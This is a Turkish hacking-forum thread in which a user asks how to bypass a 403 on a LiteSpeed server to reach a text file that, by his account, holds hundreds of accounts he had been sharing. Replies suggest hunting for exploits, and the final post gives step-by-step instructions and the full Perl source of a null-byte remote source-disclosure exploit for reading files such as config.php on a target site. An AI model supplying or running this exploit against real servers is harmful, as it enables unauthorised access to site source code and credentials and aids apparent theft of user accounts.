Tahribat.com Forumları
Bilişim Güvenliği
Litespeed Web Server İle Kısıtlanmış Dosyaya Erişim?

Yazar CodeInside (1) myblackworldweb (1) noname (4) yolbulucu (2) Gösterim 10 50 75 100
Ağ ve Veri Güvenliği     Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri     Web sitesi Güvenliği, DOS - DDOS Saldırıları...     Bilgisayar Güvenliği - Backdoorlar     Virüs - Trojan - Keylogger - BotNet     Skype - Mirc - Irc - Icq - Mail Güvenliği     Bilişim Güvenliği     Hesaplar / Üyelikler     Domain - Hosting - Reseller - Dedicated Server - Virtual Server - IRC Shell - Seedbox     İnternet Güvenliğine Giriş Programlama     C#, Asp.Net, .Net Core     C - C++     Delphi - Pascal     Visual Basic - Basic - PicBasic ve Türevleri     Java     Android - IOS Programlama     Mobil Programlama     Asp - Php - Cgi - Perl     Assembly - Reverse Engineering     Html - CSS - XML - JavaScript - Ajax     Database - Veritabanı     Python     Grafik - Animasyon - Flash - 3D Modelleme     Webmaster ve Yazılım Geliştiriciler     Google / Yandex / Bing ve Servisleri     Programlama Genel     Programlamaya Giriş Bilgisayar ve Teknoloji     Microsoft Windows Ailesi İşletim Sistemleri     Yapay Zeka     Linux ve Diğer İşletim Sistemleri     Donanım & Driver     Network - İnternet     Elektronik / Embedded / Mobil Cihazlar     Kriptoparalar & Blockchain     Fotografçılık ve Digital Fotograf Makineleri - Video Kameralar     Cep Telefonları, Gsm Operatörleri ve Mobil İnternet     Oyunlar     Yazılımlar / Diğer Programlar     Bilgisayarla İlgili Diğer Konular İnternet     Download / Dosya Paylaşım     Bilgisayar ve Internet Teknolojileri İle İlgili Video / Resim / Flash Paylaşım     İnternet Siteleri     Sosyal Ağlar Genel     Genel     Gündem - Güncel Konular     Derin Konular     Bilim Teknik Teknoloji     Müzik & Sinema & Tiyatro & Kitap & Televizyon & Seminerler & Edebiyat     Eğitim & Ödev & Bilimsel Döküman     E-Book     İş - Güç, E-Ticaret, Alışveriş     Hukuk & Muhasebe & Sigorta Soru - Cevap     Ulaşım Araçları ve Seyahat     Vukuatlar     Geyik & Teknoloji İle İlgili Olmayan Video / Resim / Flash Paylaşım Tahribat.com Konuları     Tahribat.com Programları®     Tahribat.Com - Açık Kapılar Önünde     Tahribat.Com - Sosyal Etkinlikler     TahriDepo

Litespeed Web Server İle Kısıtlanmış Dosyaya Erişim?

1. 06/Ara/09 22:44 Kısayol Şikayet Özel Mesaj
   noname
   
   

   Kayıt Tarihi: 23/Ağustos/2005
   

   Merhaba arkadaşlar , bir .txt dosyası var chmodları farklı bir sunucudan oluşturulan php dosyası ile bu txtnin editlenebileceği şekilde ayarlanmış.

   1-2 gün önce erişebiliyordum ama şimdi her nasılsa şifrelemişler. Şöyle bir uyarı vermekte : 

   403 Forbidden

   Access to this resource on the server is denied!

   ---

   Powered By LiteSpeed Web Server
   LiteSpeed Technologies is not responsible for administration and contents of this web site!

    

   Bunu mutlaka bir şekilde aşmalıyım. Lütfen yardım edin , ölüm kalım meselesi.

   www.domain/klasör1/klasör2/klasör3/dosya.txt şeklinde

   www.domain/klasör1/klasör2/klasör3/ adresine girdiğimde dosya listesini görebiliyorum.

   Yardım ... :|

    

   not : Hata varsa konum silinmesin lütfen cevaplara gerçekten ihtiyacım var.

   ---

   ...said addicted.
   Alıntı yap
2. 06/Ara/09 22:48 Kısayol Şikayet Özel Mesaj
   yolbulucu
   
   Banlanmış Üye
   

   Kayıt Tarihi: 06/Nisan/2007
   

   bi şekilde yetki vericeksin başka yolu yok git sunucunun os unu öğrenip exploit ara...

   ---

   29.99cm, titanyum kaplamalı, çift damarlı, su ve yağ soğutmalı.
   Alıntı yap
3. 06/Ara/09 22:53 Kısayol Şikayet Özel Mesaj
   noname
   
   

   Kayıt Tarihi: 23/Ağustos/2005
   

   coldfusion bunu yazdı:
   -----------------------------
   

   bi şekilde yetki vericeksin başka yolu yok git sunucunun os unu öğrenip exploit ara...

   
   -----------------------------

    

   Merhaba arkadaşlar , bir .txt dosyası var chmodları farklı bir sunucudan oluşturulan php dosyası ile bu txtnin editlenebileceği şekilde ayarlanmış.

    

    

   bu yazdığım bilgi işe yaramaz mı :(

    

   Bahsettiğim txt dosyasında yüzlerce evet 100lerce hesap kayıtlı ! ulaşıp oradan dağıtıyordum sizlere.. ama şimdi ulaşamıyorum yardım ... Yardımı dokunanlarla adresi paylaşıcam :/ unutmayın 10000000lerce !!

   ---

   ...said addicted.
   Alıntı yap
4. 06/Ara/09 23:02 Kısayol Şikayet Özel Mesaj
   yolbulucu
   
   Banlanmış Üye
   

   Kayıt Tarihi: 06/Nisan/2007
   

   uzman olsam yapardım bişeyler ama tbtdede artık eskisi kadar usta kalmadı amatör doldu... linki ver uğraşalım

   ---

   29.99cm, titanyum kaplamalı, çift damarlı, su ve yağ soğutmalı.
   Alıntı yap
5. 06/Ara/09 23:05 Kısayol Şikayet Özel Mesaj
   noname
   
   

   Kayıt Tarihi: 23/Ağustos/2005
   

   coldfusion bunu yazdı:
   -----------------------------
   

   uzman olsam yapardım bişeyler ama tbtdede artık eskisi kadar usta kalmadı amatör doldu... linki ver uğraşalım

   
   -----------------------------

    

   linki isteyen pm atsın ulu orta vermeyelim :|

   ---

   ...said addicted.
   Alıntı yap
6. 06/Ara/09 23:19 Kısayol Şikayet Özel Mesaj
   myblackworldweb
   
   

   Kayıt Tarihi: 10/Mart/2008
   

   schizophrenictr bunu yazdı:
   -----------------------------
   

   coldfusion bunu yazdı:
   -----------------------------
   

   uzman olsam yapardım bişeyler ama tbtdede artık eskisi kadar usta kalmadı amatör doldu... linki ver uğraşalım

   
   -----------------------------

    

   linki isteyen pm atsın ulu orta vermeyelim :|

   
   -----------------------------

   chmod öyle bi ayarlandı ki okuma izni yok :)

   ---

   ¯\(ツ)/¯ ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎
   Alıntı yap
7. 07/Ara/09 07:18 Kısayol Şikayet Özel Mesaj
   noname
   
   

   Kayıt Tarihi: 23/Ağustos/2005
   

   myblackworldweb bunu yazdı:
   -----------------------------
   

   schizophrenictr bunu yazdı:
   -----------------------------
   

   coldfusion bunu yazdı:
   -----------------------------
   

   uzman olsam yapardım bişeyler ama tbtdede artık eskisi kadar usta kalmadı amatör doldu... linki ver uğraşalım

   
   -----------------------------

    

    

   linki isteyen pm atsın ulu orta vermeyelim :|

   
   -----------------------------

    

   chmod öyle bi ayarlandı ki okuma izni yok :)

   
   -----------------------------

    

   olmalı :|

   ---

   ...said addicted.
   Alıntı yap
8. 07/Ara/09 19:34 Kısayol Şikayet Özel Mesaj
   noname
   
   

   Kayıt Tarihi: 23/Ağustos/2005
   

   up

   ---

   ...said addicted.
   Alıntı yap
9. 09/Ağu/10 01:04 Kısayol Şikayet Özel Mesaj
   CodeInside
   
   Banlanmış Üye
   

   Kayıt Tarihi: 20/Aralık/2009
   

   Cevap biraz geç olacak ama LiteSpeed'in henüz çokta eski sayılmayan bir açığı var

   bu açık sayesinde LiteSpeed Web Server üzerindeki istediğin .php tarzı dosyaları okuyabiliyorsun

    

   Anlatıma Geçelim:

   Exploiti Kullanman İçin Bilgisayarında Perl Yüklü Olmalıdır Strawberry Perl öneririm

   Aşağıda Vereceğim Exploit Kodlarını lite.pl olarak kaydet ve C:\Perl\Bin Klasörüne At

    

   Sonra Başlat > Çalıştır > cmd

   Gelen Ms-Dos Ekranına cd.. komutunu vererek C:\ dizinine kadar tekrarla C:\ ulaştıktan sonra 

   cd C:\perl\bin Yazıp Enter'la ve Sonra Exploit Kodumuzu Yazıyoruz

    

   perl lite.pl www.hedefsitemiz.com config.php

    

   bu komut sana doğrudan config.php dosyasının içeriğini verir :) yani rahatça okursun.

    

   Exploit Kodları: 

   #!/usr/bin/perl
   #
   #LiteSpeed Technologies Web Server Remote Source Code Disclosure zero-day
   Exploit
   #By Kingcope
   #Google search: ""Proudly Served by LiteSpeed Web Server""
   #June 2010
   #Thanks to TheDefaced for the idea, http://www.milw0rm.com/exploits/4556
   #
   
   use IO::Socket;
   use strict;
   
   sub getphpsrc {
   my $host = shift;
   my $file = shift;
   
   if (substr($file, 0, 1) eq "/") {
       $file = substr($file, 1);
   }
   my $file2 = $file;
   $file2 =~ s/\//_/g;
   print "Saving source code of $file into $host-$file2\n";
   
   my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                 PeerPort => '80',
                                 Proto    => 'tcp') || die("Could not connect
   to $ARGV[0]");
   
   print $sock "GET /$file\x00.txt HTTP/1.1\r\nHost: $ARGV[0]\r\nConnection:
   close\r\n\r\n";
   
   my $buf = "";
   
   my $lpfound = 0;
   my $saveme = 0;
   my $savveme = 0;
   while(<$sock>) {
       if ($_ =~ /LiteSpeed/) {
           $lpfound = 1;
       }
   
       if ($saveme == 2) {
           $savveme = 1;
       }
   
       if ($saveme != 0 && $savveme == 0) {
           $saveme++;
       }
   
       if ($_ =~ /Content-Length:/) {
               $saveme = 1;
       }
   
       if ($savveme == 1) {
           $buf .= $_;
       }
   }
   
   if ($lpfound == 0) {
       print "This does not seem to be a LiteSpeed Webserver, saving file
   anyways.\n";
   }
   
   open FILE, ">$host-$file2";
   print FILE $buf;
   close FILE;
   print "Completed.\n";
   }
   
   print "LiteSpeed Technologies Web Server Remote Source Code Disclosure
   Exploit\n";
   print "By Kingcope\n";
   print "June 2010\n\n";
   
   if ($#ARGV != 1) {
       print "Usage: perl litespeed.pl  \n";
       print "Example: perl litespeed.pl www.thedomain.com index.php\n";
       exit(0);
   }
   
   getphpsrc($ARGV[0], $ARGV[1]);
   
   print "Operation Completed :>.\n";

    

   Umarım Faydalı Olmuştur Geçte Olsa :)

   Alıntı yap

Cevapla